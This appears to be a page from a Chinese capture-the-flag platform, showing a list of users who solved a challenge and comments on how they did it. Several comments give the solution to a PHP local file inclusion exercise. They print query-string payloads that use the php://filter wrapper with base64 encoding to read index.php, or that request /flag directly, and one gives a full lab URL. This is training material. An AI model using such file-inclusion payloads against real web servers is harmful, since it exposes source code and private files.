评分(11)
解题动态

wz666 攻破了该题 18分钟前

millim 攻破了该题 32分钟前

HKzhou 攻破了该题 5小时前

lin666 攻破了该题 8小时前

foxkiller 攻破了该题 1天前

爱吃馒头 攻破了该题 1天前

jhon 攻破了该题 1天前

desireart 攻破了该题 1天前

暗A166668 攻破了该题 2天前

吴王饭差 攻破了该题 2天前

欲语泪先流 攻破了该题 2天前

统计系1008 攻破了该题 2天前

白六真的6 攻破了该题 3天前

ZQCblack 攻破了该题 3天前

baotou91 攻破了该题 3天前

2021060287 攻破了该题 3天前

5326 攻破了该题 4天前

jkljkl 攻破了该题 4天前

Adwuwuuuuc 攻破了该题 4天前

评论
HKzhou 5小时前
举报
flag{***}
VVang 6天前
举报
用php://filter包含index.php,然后base64解码得到flag
聪10011 20天前
举报
猜flag位置,file=/flag
8208240204 1月前
举报
?file=php://filter/read=convert.base64-encode/resource=index.php 然后发现==表明是base64解码得到flag
2686213396 1月前
举报
http://117.72.52.127:17540/index.php?file=php://filter/convert.base64-encode/resource=index.php,php伪协议,读取 index.php文件
zhuizhui 2月前
举报
?file=php://filter/read=convert.base64-encode/resource=index.php
17734916426 4月前
举报
index.php?file=/flag
shingu 5月前
举报
这题过于简单了。?file=/flag。
HK1ng 8月前
举报
使用伪协议来解题,启动靶机发现有超链接,点击后发现有file变量,然后页面有index.php,于是猜想是不是传一个index.php,果然不是。然后就给出这个提示,想办法去读一下这个,然后这里就是用了php://filter/read=convert.base64encode/resource=filepath,表示以base64编码的方式进行读取指定路径的文件。然后解码就可以看到。
000ooo 9月前
举报
/index.php?file=/flag
哈哈哈嘿嘿嘿 6月前
举报
为什么